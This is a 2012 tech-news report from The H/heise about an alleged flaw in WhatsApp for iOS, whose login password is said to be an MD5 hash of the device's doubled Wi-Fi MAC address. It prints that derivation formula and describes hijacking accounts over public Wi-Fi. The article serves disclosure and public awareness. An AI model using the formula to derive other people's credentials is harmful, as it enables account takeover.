In association with heise online

12 September 2012, 09:27

WhatsApp allegedly creates overly simple passwords under iOS too

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

WhatsApp logo The iOS version of WhatsApp, the popular app-based alternative to texting, like the Android version of the application, is also using a primitive method to generate log-in passwords. According to a post on an Italian blog, the iOS client simply doubles the Wi-Fi interface's MAC address and generates an MD5 hash from it: md5(AA:BB:CC:DD:EE:FFAA:BB:CC:DD:EE:FF).

To prove this, the author provides an excerpt from the iPhone app's disassembled code. If the allegations turn out to be true, the author has found a serious security problem: WhatsApp only requires users' phone numbers and these automatically generated passwords for authentication. If the app is used over, for example, a public hotspot, this would easily allow other Wi-Fi network users to read this information – and potentially even to permanently take control of accounts.

The MAC address is publicly available on a network anyway and a test by The H's associates at heise Security has shown that transferred messages include a plain text version of the user's number – despite the recently introduced message encryption. Under Android, WhatsApp uses the smartphone's IMEI number, rather than the Wi-Fi MAC address, to generate the password.


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit